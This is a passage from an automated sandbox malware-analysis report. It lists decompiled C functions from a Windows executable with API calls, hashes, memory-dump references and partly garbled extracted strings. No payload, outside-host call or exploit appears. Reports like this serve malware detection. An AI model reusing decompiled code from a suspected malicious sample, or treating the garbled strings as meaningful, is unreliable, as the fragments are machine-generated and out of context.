                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: FileNameOpenwcscpy
                                                                                      • String ID: L
                                                                                      • API String ID: 3246554996-2909332022
                                                                                      • Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                      • Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
                                                                                      • Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                      • Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 58%
                                                                                      			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                      				void* __esi;
                                                                                      				_Unknown_base(*)()* _t10;
                                                                                      				void* _t12;
                                                                                      				struct HINSTANCE__** _t13;
                                                                                      
                                                                                      				_t13 = __eax;
                                                                                      				_t12 = 0;
                                                                                      				if(E00408F72(__eax) != 0) {
                                                                                      					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
                                                                                      					if(_t10 != 0) {
                                                                                      						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
                                                                                      					}
                                                                                      				}
                                                                                      				return _t12;
                                                                                      			}








                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressProc
                                                                                      • String ID: LookupAccountSidW$Y@
                                                                                      • API String ID: 190572456-2352570548
                                                                                      • Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                      • Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
                                                                                      • Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                      • Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 37%
                                                                                      			E0040AD85(intOrPtr _a4) {
                                                                                      				_Unknown_base(*)()* _t3;
                                                                                      				void* _t7;
                                                                                      				struct HINSTANCE__* _t8;
                                                                                      				char** _t9;
                                                                                      
                                                                                      				_t7 = 0;
                                                                                      				_t8 = E00405436(L"shlwapi.dll");
                                                                                      				 *_t9 = "SHAutoComplete";
                                                                                      				_t3 = GetProcAddress(_t8, ??);
                                                                                      				if(_t3 != 0) {
                                                                                      					_t7 =  *_t3(_a4, 0x10000001);
                                                                                      				}
                                                                                      				FreeLibrary(_t8);
                                                                                      				return _t7;
                                                                                      			}








                                                                                      APIs
                                                                                        • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                        • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                      • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                      • FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Library$Load$AddressFreeProcmemsetwcscat
                                                                                      • String ID: shlwapi.dll
                                                                                      • API String ID: 4092907564-3792422438
                                                                                      • Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                      • Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
                                                                                      • Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                      • Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00406597(wchar_t* __esi) {
                                                                                      				wchar_t* _t2;
                                                                                      				wchar_t* _t6;
                                                                                      
                                                                                      				_t6 = __esi;
                                                                                      				E00404AD9(__esi);
                                                                                      				_t2 = wcsrchr(__esi, 0x2e);
                                                                                      				if(_t2 != 0) {
                                                                                      					 *_t2 =  *_t2 & 0x00000000;
                                                                                      				}
                                                                                      				return wcscat(_t6, L"_lng.ini");
                                                                                      			}






                                                                                      APIs
                                                                                        • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                      • wcsrchr.MSVCRT ref: 004065A0
                                                                                      • wcscat.MSVCRT ref: 004065B6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: FileModuleNamewcscatwcsrchr
                                                                                      • String ID: _lng.ini
                                                                                      • API String ID: 383090722-1948609170
                                                                                      • Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                      • Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
                                                                                      • Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                      • Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040AC52() {
                                                                                      				struct HINSTANCE__* _t1;
                                                                                      				_Unknown_base(*)()* _t2;
                                                                                      
                                                                                      				if( *0x4101c4 == 0) {
                                                                                      					_t1 = E00405436(L"shell32.dll");
                                                                                      					 *0x4101c4 = _t1;
                                                                                      					if(_t1 != 0) {
                                                                                      						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
                                                                                      						 *0x4101c0 = _t2;
                                                                                      						return _t2;
                                                                                      					}
                                                                                      				}
                                                                                      				return _t1;
                                                                                      			}






                                                                                      APIs
                                                                                        • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                        • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                      • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 90%
                                                                                      			E00406670(char** __esi, void* __eflags) {
                                                                                      				char* _t30;
                                                                                      				char** _t39;
                                                                                      
                                                                                      				_t39 = __esi;
                                                                                      				 *__esi = "cf@";
                                                                                      				__esi[0xb8] = 0;
                                                                                      				_t30 = E00404FA4(0x338, __esi);
                                                                                      				_push(0x14);
                                                                                      				__esi[0xcb] = 0;
                                                                                      				__esi[0xa6] = 0;
                                                                                      				__esi[0xb9] = 0;
                                                                                      				__esi[0xba] = 0xfff;
                                                                                      				__esi[8] = 0;
                                                                                      				__esi[1] = 0;
                                                                                      				__esi[0xb7] = 1;
                                                                                      				L0040B26C();
                                                                                      				if(_t30 == 0) {
                                                                                      					_t30 = 0;
                                                                                      				} else {
                                                                                      					_t30[4] = 0;
                                                                                      					_t30[0x10] = 0;
                                                                                      					_t30[8] = 0;
                                                                                      					_t30[0xc] = 0x100;
                                                                                      					 *_t30 = 0;
                                                                                      				}
                                                                                      				_push(0x14);
                                                                                      				_t39[2] = _t30;
                                                                                      				L0040B26C();
                                                                                      				if(_t30 == 0) {
                                                                                      					_t30 = 0;
                                                                                      				} else {
                                                                                      					_t30[4] = 0;
                                                                                      					_t30[0x10] = 0;
                                                                                      					_t30[8] = 0;
                                                                                      					_t30[0xc] = 0x100;
                                                                                      					 *_t30 = 0;
                                                                                      				}
                                                                                      				_push(0x14);
                                                                                      				_t39[3] = _t30;
                                                                                      				L0040B26C();
                                                                                      				if(_t30 == 0) {
                                                                                      					_t30 = 0;
                                                                                      				} else {
                                                                                      					_t30[4] = 0;
                                                                                      					_t30[0x10] = 0;
                                                                                      					_t30[8] = 0;
                                                                                      					_t30[0xc] = 0x100;
                                                                                      					 *_t30 = 0;
                                                                                      				}
                                                                                      				_push(0x14);
                                                                                      				_t39[4] = _t30;
                                                                                      				L0040B26C();
                                                                                      				if(_t30 == 0) {
                                                                                      					_t30 = 0;
                                                                                      				} else {
                                                                                      					_t30[4] = 0;
                                                                                      					_t30[0x10] = 0;
                                                                                      					_t30[8] = 0;
                                                                                      					_t30[0xc] = 0x100;
                                                                                      					 *_t30 = 0;
                                                                                      				}
                                                                                      				_t39[5] = _t30;
                                                                                      				return _t39;
                                                                                      			}






                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: ??2@$memset
                                                                                      • String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
                                                                                      				int _v8;
                                                                                      				signed int _v12;
                                                                                      				void* __edi;
                                                                                      				int _t32;
                                                                                      				intOrPtr _t33;
                                                                                      				intOrPtr _t36;
                                                                                      				signed int _t48;
                                                                                      				signed int _t58;
                                                                                      				signed int _t59;
                                                                                      				void** _t62;
                                                                                      				void** _t63;
                                                                                      				signed int* _t66;
                                                                                      
                                                                                      				_t66 = __eax;
                                                                                      				_t32 = wcslen(_a4);
                                                                                      				_t48 =  *(_t66 + 4);
                                                                                      				_t58 = _t48 + _t32;
                                                                                      				_v12 = _t58;
                                                                                      				_t59 = _t58 + 1;
                                                                                      				_v8 = _t32;
                                                                                      				_t33 =  *((intOrPtr*)(_t66 + 0x14));
                                                                                      				 *(_t66 + 4) = _t59;
                                                                                      				_t62 = _t66 + 0x10;
                                                                                      				if(_t59 != 0xffffffff) {
                                                                                      					E00404951(_t66, _t59, _t62, 2, _t33);
                                                                                      				} else {
                                                                                      					free( *_t62);
                                                                                      				}
                                                                                      				_t60 =  *(_t66 + 0x1c);
                                                                                      				_t36 =  *((intOrPtr*)(_t66 + 0x18));
                                                                                      				_t63 = _t66 + 0xc;
                                                                                      				if( *(_t66 + 0x1c) != 0xffffffff) {
                                                                                      					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
                                                                                      				} else {
                                                                                      					free( *_t63);
                                                                                      				}
                                                                                      				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
                                                                                      				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
                                                                                      				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
                                                                                      				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
                                                                                      				_t30 =  *(_t66 + 0x1c) - 1; // -1
                                                                                      				return _t30;
                                                                                      			}
















                                                                                      APIs
                                                                                      • wcslen.MSVCRT ref: 004054EC
                                                                                      • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F
                                                                                        • Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
                                                                                        • Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
                                                                                        • Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                      • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
                                                                                      • memcpy.MSVCRT ref: 00405556
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                      • String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 81%
                                                                                      			E00405ADF() {
                                                                                      				void* _t25;
                                                                                      				signed int _t27;
                                                                                      				signed int _t29;
                                                                                      				signed int _t31;
                                                                                      				signed int _t33;
                                                                                      				signed int _t50;
                                                                                      				signed int _t52;
                                                                                      				signed int _t54;
                                                                                      				signed int _t56;
                                                                                      				intOrPtr _t60;
                                                                                      
                                                                                      				_t60 =  *0x41c470;
                                                                                      				if(_t60 == 0) {
                                                                                      					_t50 = 2;
                                                                                      					 *0x41c470 = 0x8000;
                                                                                      					_t27 = 0x8000 * _t50;
                                                                                      					 *0x41c474 = 0x100;
                                                                                      					 *0x41c478 = 0x1000;
                                                                                      					_push( ~(0 | _t60 > 0x00000000) | _t27);
                                                                                      					L0040B26C();
                                                                                      					 *0x41c458 = _t27;
                                                                                      					_t52 = 4;
                                                                                      					_t29 =  *0x41c474 * _t52;
                                                                                      					_push( ~(0 | _t60 > 0x00000000) | _t29);
                                                                                      					L0040B26C();
                                                                                      					 *0x41c460 = _t29;
                                                                                      					_t54 = 4;
                                                                                      					_t31 =  *0x41c474 * _t54;
                                                                                      					_push( ~(0 | _t60 > 0x00000000) | _t31);
                                                                                      					L0040B26C();
                                                                                      					 *0x41c464 = _t31;
                                                                                      					_t56 = 2;
                                                                                      					_t33 =  *0x41c478 * _t56;
                                                                                      					_push( ~(0 | _t60 > 0x00000000) | _t33);
                                                                                      					L0040B26C();
                                                                                      					 *0x41c45c = _t33;
                                                                                      					return _t33;
                                                                                      				}
                                                                                      				return _t25;
                                                                                      			}














                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: ??2@
                                                                                      • String ID:
                                                                                      • API String ID: 1033339047-0
                                                                                      • Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                      • Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
                                                                                      • Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                      • Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Executed Functions

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.469340657.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "3"saCtriP "" ttwdi/"a.st}{ mnlFX/$"saCtriP "" ttwdi/"a.st}{ mnlFX/$saCtriP "" ttwdi/"a.st}{ mnlFX/
                                                                                      • API String ID: 0-1166855168
                                                                                      • Opcode ID: ec565017859d1ac95f052bb177ddf24f809d69adbe575d99732cd01da2111c6b
                                                                                      • Instruction ID: b321373b0709f1f9c287143b9755ecb2e5e7aee37c5632cfb903e17e48249033
                                                                                      • Opcode Fuzzy Hash: ec565017859d1ac95f052bb177ddf24f809d69adbe575d99732cd01da2111c6b
                                                                                      • Instruction Fuzzy Hash: 6703B214E2530089C7B58F8483D8A6D27E2AF85344F16D6DBE0941F6F6FBB18998C74B
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.469340657.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "3"saCtriP "" ttwdi/"a.st}{ mnlFX/$"saCtriP "" ttwdi/"a.st}{ mnlFX/$saCtriP "" ttwdi/"a.st}{ mnlFX/
                                                                                      • API String ID: 0-1166855168
                                                                                      • Opcode ID: e0efc4dc2605b1852fd0f1a75a3605a762c5cecec711b02d1b515942ea503958
                                                                                      • Instruction ID: f5c18e6949dcf25e64b754d6a87b30020d6b3fe211ea7b76c37e58e68e4307df
                                                                                      • Opcode Fuzzy Hash: e0efc4dc2605b1852fd0f1a75a3605a762c5cecec711b02d1b515942ea503958
                                                                                      • Instruction Fuzzy Hash: 9E03B214E2530089C7B58F8483D8A6D27E2AF85344F16D6DBE0941F6F6FBB18998C74B
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.469340657.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 49d4d775e9e0a43fa511d13c0adace4aeeec907f29e08d358e3686978311933a
                                                                                      • Instruction ID: 9862545d66870ccaeb04334b514808b6c4ec270004d5e9d2fac780a192792dad
                                                                                      • Opcode Fuzzy Hash: 49d4d775e9e0a43fa511d13c0adace4aeeec907f29e08d358e3686978311933a
                                                                                      • Instruction Fuzzy Hash: A102AE70A002198FDB14DF68C894BAEBBF6AF88304F158169E945EB395DF34DD46CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.469340657.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bf2856d0bf227dc2fe2545a81ce960d446bad2f22c4188aaabc09a422fbf300b
                                                                                      • Instruction ID: 3132ee703653d2e46c702a7749a53634d7c52b9f5bde1d5b06644482043d4484
                                                                                      • Opcode Fuzzy Hash: bf2856d0bf227dc2fe2545a81ce960d446bad2f22c4188aaabc09a422fbf300b
                                                                                      • Instruction Fuzzy Hash: 0C028F30A00219CFCB55DFA8C984AADBBF2FF89340F1580A9E995EB261D730EC41CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.469340657.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Pt$Pt$Pt$Pt$py$py
                                                                                      • API String ID: 0-3817749120
                                                                                      • Opcode ID: 029fab432bd7242c0fe7ec4fe5d58474773e410aecb3ff7ead5900438a19c9e7
                                                                                      • Instruction ID: 734f04fa73dcf64113e78f630dd27fdd7546809d0ba1cad387cb8da19569e237
                                                                                      • Opcode Fuzzy Hash: 029fab432bd7242c0fe7ec4fe5d58474773e410aecb3ff7ead5900438a19c9e7
                                                                                      • Instruction Fuzzy Hash: 223194347042099FDB059F69D859A6E7BA2EB88310F008428F999A7369CB35CD25CBD0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.469340657.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Pt$Pt$Pt$py
                                                                                      • API String ID: 0-1209193659
                                                                                      • Opcode ID: cdd935889e3c8c11817a204b44109272aa28a031611491ab6c0e729d1e9ab3c2
                                                                                      • Instruction ID: 417a87f2480fb373e94f195c60e9046f579c7b159533fb34e8efdc755c511687
                                                                                      • Opcode Fuzzy Hash: cdd935889e3c8c11817a204b44109272aa28a031611491ab6c0e729d1e9ab3c2
                                                                                      • Instruction Fuzzy Hash: AB21C6356042099FDB159F68E409B6B7BF1EF84310F108428F599AB25ADB34CD15CBD0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.469340657.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Zul
                                                                                      • API String ID: 0-1547176656
                                                                                      • Opcode ID: 7650f6b64fa8a9ab1d67f338282a6431c61d54933cb6736b75ce603abc35dc99
                                                                                      • Instruction ID: 4c3c4e2a0803f476a31cabb0a7b8eac35f82f6301ff89f8093e60421759a1af9
                                                                                      • Opcode Fuzzy Hash: 7650f6b64fa8a9ab1d67f338282a6431c61d54933cb6736b75ce603abc35dc99
                                                                                      • Instruction Fuzzy Hash: 2BF25FD8B21700C8DB758B0581D8A6DA6F2AF46344F97A1EBC0E51F636E3B5458BC70B
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.469340657.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Zul
                                                                                      • API String ID: 0-1547176656
                                                                                      • Opcode ID: dcde24f9ddac7e9b11c048869612fcd02f04fb7e6ff9e3c065c18cbfcd5cbe43
                                                                                      • Instruction ID: 827b0235cc5810a9da4608ec7086d262e975444bacb2fe3eb8e09bc3cab78acb
                                                                                      • Opcode Fuzzy Hash: dcde24f9ddac7e9b11c048869612fcd02f04fb7e6ff9e3c065c18cbfcd5cbe43
                                                                                      • Instruction Fuzzy Hash: 21F25FD8B21700C8DB758B0581D8A6DA6F2AF46344F97A1EBC0E51F536E3B5458BC70B
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.469340657.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: py$py
                                                                                      • API String ID: 0-870927166
                                                                                      • Opcode ID: d1a0380bb7d0111ce843b1bbad559d5e1a2b38f5192eb9fa2263fbd6e7fbfb1c
                                                                                      • Instruction ID: c61a48163ec16c3c827b4c2f68cff6ef298b9a7250ec05f07b0b1acd79bacab2
                                                                                      • Opcode Fuzzy Hash: d1a0380bb7d0111ce843b1bbad559d5e1a2b38f5192eb9fa2263fbd6e7fbfb1c
                                                                                      • Instruction Fuzzy Hash: 9481B134B042149FDB09DF68C859BAE7BE6ABC9341F058468F646EB291CF309D46CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.469340657.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: py$py
                                                                                      • API String ID: 0-870927166
                                                                                      • Opcode ID: 8f63e3b2d3a1a039142d28f65ce9f835918867831db76cb310d11dc33ec52cfe
                                                                                      • Instruction ID: ffbec96aa9c519d348fad4dd1365074efcb3fb83a05fdc1368ffee118e9cea5b
                                                                                      • Opcode Fuzzy Hash: 8f63e3b2d3a1a039142d28f65ce9f835918867831db76cb310d11dc33ec52cfe
                                                                                      • Instruction Fuzzy Hash: 6831813130020AAFCF46AFADD854AAE3BE6FF88305F044429F955D7251CB35CA21DB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.469340657.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Pt$Pt
                                                                                      • API String ID: 0-1931524224
                                                                                      • Opcode ID: 1c68dab4d4e53a9a9672e578973a117bb818b75e2d67292f89efe6567442252a
                                                                                      • Instruction ID: c13115e99e3d9928afa08b2a9f81d5a2c2a7527ce2c24a16f6235eea27faa1de
                                                                                      • Opcode Fuzzy Hash: 1c68dab4d4e53a9a9672e578973a117bb818b75e2d67292f89efe6567442252a
                                                                                      • Instruction Fuzzy Hash: C221F3353047108FC328BB2AD848A2EBBE2AB89751B1544A9E556DB3A4DF30DC06CBD0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.469340657.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: py$py
                                                                                      • API String ID: 0-870927166
                                                                                      • Opcode ID: 4d32676bacdd0a3ca175454e02ce327f9f030c6b984ce3a75fd6a18d6b65d465
                                                                                      • Instruction ID: dc60fb6f5e85190c8e5b648a8704d11ad0b084602344f7963aa73bb58e97c0ab
                                                                                      • Opcode Fuzzy Hash: 4d32676bacdd0a3ca175454e02ce327f9f030c6b984ce3a75fd6a18d6b65d465
                                                                                      • Instruction Fuzzy Hash: DE01D632B041186BCB059EA9A800BEF3BDBDBC8760F15802AF645E7240DE71DD118BD4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.469340657.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: eeePMdA
                                                                                      • API String ID: 0-4262204540
                                                                                      • Opcode ID: 8e497c44452cb1ef9698382444544bc4c03727fb06953f1ec13a6bc01a32de3d
                                                                                      • Instruction ID: b975c1956036d22ee94d32c4346e0347eb5bcce0406acc8acaac28432d1d6851
                                                                                      • Opcode Fuzzy Hash: 8e497c44452cb1ef9698382444544bc4c03727fb06953f1ec13a6bc01a32de3d
                                                                                      • Instruction Fuzzy Hash: 39B2DF54D313088CC7B59F58C29896D26E3EE85348B62B1DBD0940F67AE3B589CDC78B
                                                                                      Uniqueness

